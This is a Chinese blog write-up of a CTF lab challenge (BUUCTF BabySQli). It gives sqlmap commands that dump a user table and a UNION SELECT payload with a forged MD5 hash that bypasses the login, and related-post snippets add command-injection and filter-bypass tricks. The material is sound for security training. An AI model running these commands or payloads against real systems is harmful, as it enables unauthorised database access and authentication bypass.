BUUCTF:[GXYCTF2019]BabySQli

最新推荐文章于 2024-06-15 18:38:29 发布
最新推荐文章于 2024-06-15 18:38:29 发布
阅读量270 收藏
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fcz___/article/details/129720021
版权

打开靶机
在这里插入图片描述
是一个登录框。右键看一下源码。
在这里插入图片描述
可以看到是以post方法传参。感觉像时间盲注。随便输入一个用户名和密码,然后bp抓包。
在这里插入图片描述
我们把这个页面全部复制,创建一个txt文件粘贴进去。

在这里插入图片描述
把这个文件托进kali里然后打开终端,用sqlmap扫描数据库。
命令:sqlmap -r /home/wz/桌面/2.txt --dbs
这个文件路径就输入你的路径。然后一路点y。
请添加图片描述
可以看到数据库为:information_schema和web_sqli。根据经验我们应该爆破第二个。命令为:

sqlmap -r /home/wz/桌面/2.txt -D web_sqli --tables

请添加图片描述
可以看到爆出的表名为:user。我们爆字段。
命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user --columns

在这里插入图片描述
然后我们爆数据。命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user -C id,passwd,username --dump

在这里插入图片描述
然后你会发现这个md5碰撞不出来。我们还得构造。
mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5;所以我们去哈希一下123得202cb962ac59075b964b07152d234b70。
我们payload: name=1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123
最后放松一下眼睛。请添加图片描述

请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述

![请添加图片描述](https://img-blog.csdnimg.cn/2052feaaf2184bdea3ed14a9450

请添加图片描述

图片是抖音@瞳瞳

寡人略秀
关注
BuuCTFBabySQL WP
weixin_51019270的博客
01-11 251
BuuCTFBabySQL WP 一:判断闭合条件 在用户名的位置输入1’显示错误,说明是单引号闭合。开始构造------》 二:构造开始 构造几遍以后构造出可以得到有用信息的网页 看报错信息可以知道,我们的or被屏蔽掉了,去网上查了一下,是被replace给替换成空白字符了。 根据前两题的经验,猜测列数是3。直接上联合查询看能不能报显示位。 成功以后直接老办法,爆库,爆表,爆列。flag还是在password的最后一个。直接上图了 拿到flag。提交然后结束。 ...
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5293
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
BUUCTF[GXYCTF2019]BabySQli
最新发布
firecjh的博客
06-15 409
筛选有用的代码,发现代码赋值$result时使用了mysqli_query()函数,这个函数用于执行某个针对数据库的查询并且规定只能查询字符串,证明了上面的猜测,从代码中可以发现$arr使用了mysqli_fetch_row函数,将所有返回结果作为枚举数组,所有返回结果又是从数据库中查询出来的,说明数组的值和数据库的值相同,那么查询数据库的值时也相当于在查数组的值,由于之前返回了联合查询时返回了wrong pass!发现成功返回flag。
buuctf [GXYCTF2019]BabySQli
SopRomeo的博客
03-05 6070
常规sql注入都行不通,查看源码发现一个search.php, 先说说base32 和 base64 的区别, base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 明显,那段文字是base32加密 解密后:c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW...
buuctf babysqli
weixin_55567437的博客
07-15 137
从这条信息可以知道这是base32码,解码得到一个base64码 解码得到一个: select * from user where username = '".$name."' 不能得到有用的信息但通过题目源码得知password被md5加密了 所以得找个办法绕过加密。构建一个payload虚拟身份绕过审核机制。 通过burp suite 并构建一个name=1' union select 1,'admin','.......'#pw=123 '......'就是123的...
buuctf BabySQli
qq_44111753的博客
01-02 1064
随便输入,发现一串密文,数字+大写字母,大概是采用base32加密 base32解密如下,有“=”,猜测是base64加密 base64解密如下 查询后台数据库username等于输入值得所有数据 后台数据库的登录逻辑大概是:将输入的用户名与后台数据库中的所有用户名做比较,找出相等的,然后用这组数据的密码与用户输入的密码作比较,若相等,则登录成功 重要点:放置于后台的数据库大概率是经过hash加密的 操作:在用户名框注入 1’ union select ‘admin’,加密后的密码 为了使登录成功,注入
BUUCTF [GXYCTF2019]minecraft
weixin_53349587的博客
01-06 1006
1.拿到文件,一共有exe文件和dll文件、lib文件三个文件 dll文件和lib文件不知道有什么用,所以先IDA打开exe文件: 里面有一个关键的函数String_to_long,对应的加密过程是在动态链接库里,所以我们用IDA打开dll文件,找到String_to_long这个函数: 第64行有一个"-------Checking-----",我们运行应用程序输入之后也会出现这个字符串,这也更加证实了这个函数为主函数。 2.分析函数: 首先,我们知道a1是我们的输入,只需要分析对a1.
BUUCTF:[GXYCTF2019]BabySQli
末初的CSDN博客
11-07 2272
https://buuoj.cn/challenges#[GXYCTF2019]BabySQli 登陆类注入,有过滤 这是一段base32解码后是base64再解一次得到 select * from user where username = '$name' Trick 使用联合查询构造虚拟查询记录进行登录 这里有个小坑,原题应该是有对密码进行了md5加密后存储的,但是这里没有提示 PS C:\Users\Administrator> php -r "var_dump(md5('mo
BUUCTF[GXYCTF2019]Ping Ping Ping
楼阁de猫的博客
12-19 300
[GXYCTF2019]Ping Ping Ping 直接ping 127.0.0.1 有回显,ls一下 发现flag.php,cat一下 事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法 $IFS ${IFS} $IFS$9 //$9改成 $ 加其他数字貌似都行 < <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09(Tab) 这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p
BUUCTF-[GXYCTF2019]BabySQli
m0_61361405的博客
10-22 98
首先看有什么信息:网站就是一个登陆界面可以看到,这里的注入点是“name”就是username窗口这段代码是一个简单的防护措施,用于检测用户提供的$name参数是否包含一些特定的字符或字符串。这一行使用了 PHP 的preg_match函数来检查$name是否匹配正则表达式。\(\)\=or如果在$name中出现了任何一个字符或字符串,preg_match函数将返回1,表示匹配成功,否则返回0,表示没有匹配。这里匹配了“or”那我们之后就用大写绕过:Or条件检查$result变量是否为空或为假。
buuctf-BabySQli
m0_62094846的博客
03-25 295
POST传参,先随便传入几个值,用bp查看 尝试后发现or等很多都被过滤了,但是可以用select,判断字段数 说明有3个字段 , 源代码中有加密代码,看着这纯大写+数字,就猜是base32,用base32解密,再用base64解密可以得到 这是sql查询语句,说明主要的查询对象是name而不是pw 看别人的wp,name是admin 之前是wrong user现在变成wrong pass 说明user是正确的 把它带入查询语句 发现只有admin在...
BUUCTF——[GXYCTF2019]BabySQli
Ho1aAs‘s Blog
05-27 1231
文章目录利用点解题分析完 利用点 SQL字符型注入 UNION SELECT联合查询特性 解题 search.php的注释发现hint <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> 先base32再base64 select * from user where username = '$name' 明白了查询语句,先试试admi
BUUCTFBabySQli[GXYCTF2019]
金 帛的博客
05-06 595
BUUCTF的WP
buuctf [GXYCTF2019]BabySQli
weixin_43152809的博客
10-14 929
今日份习题 名字叫babysqli 主界面是一个登陆页面,看起来好像不难的亚子 开搞! 通过尝试发现or,=,()都被过滤了 输入的时候,一个是wrong user,一个是wrong pass,尝试抓了一下包 发现了一串奇怪的字符串,尝试base64加密,失败了,我以为出题人坑我呢。。。 好在在题目的主界面发现了一个GitHub的网址 进去后发现了题目的源码 主要点在这里: select * from user where username = '".$name."' password被md5加密
BUUCTF之[GXYCTF2019]BabySQli
weixin_44632787的博客
10-03 2503
题目 这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。 启动BurpSuite抓包看看 有两个可疑点: 一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。 这里返回的绿色部分明显是加密后的数据 首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64 原数据: MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C
【复习】BUUCTF:[GXYCTF2019]BabyUpload -- 对.htaccess的 包含自己和解析图片马为php文件都可以的 。。也算easy
Zero_Adam的博客
04-19 1203
一、自己做: 只需要更改Content-Type就能够绕过了,但是好像对文件内容有过滤。 那么,不能有? ,看看PHP的版本,看看能够用html的script进行绕过 能成功,看看能否解析。
[BUUCTF]BabySQli (writeup)
weixin_63306244的博客
06-27 247
所以就要像 [GXYCTF2019]Ping Ping Ping 那样用rename来提取出来。这个表不能和其他会话共享直到HANDLER ... CLOSE。语句会打开一个表,使其能够用后续的HANDLER ... READ。但是发现是不行的,不过更确定了flag在这里面。光看这个文件名就可以知道flag在这里面。但是开头就看到了他将rename过滤。是用堆叠注入,然后看这题过滤的东西。得到了FlagHere这个文件。那就直接 order by。所以要用另一种办法,那就是。发现爆了一些过滤的字符。
BUUCTF [GXYCTF2019]BabySQli 1
lzu_lfl的博客
10-06 440
union联合查询生成虚拟数据
union的特性注入--buuctf babysqli
weixin_51313108的博客
08-22 384
union特性注入前言union的特性例题buuctf--babysql查看源码 前言 可以利用union特性注入的ctf题其实后端代码要求与往常代码不一样,一般的注入方法并不能对后端造成攻击,要攻破SQL数据库要利用好union的特性。 union的特性 union(联合的特性),看一个例子 select * from tb_user where username='admin' union select 1, 'admin','mochu7' union在保证字段数相同的情况下联合查询一个不存在的数据时
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2842
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值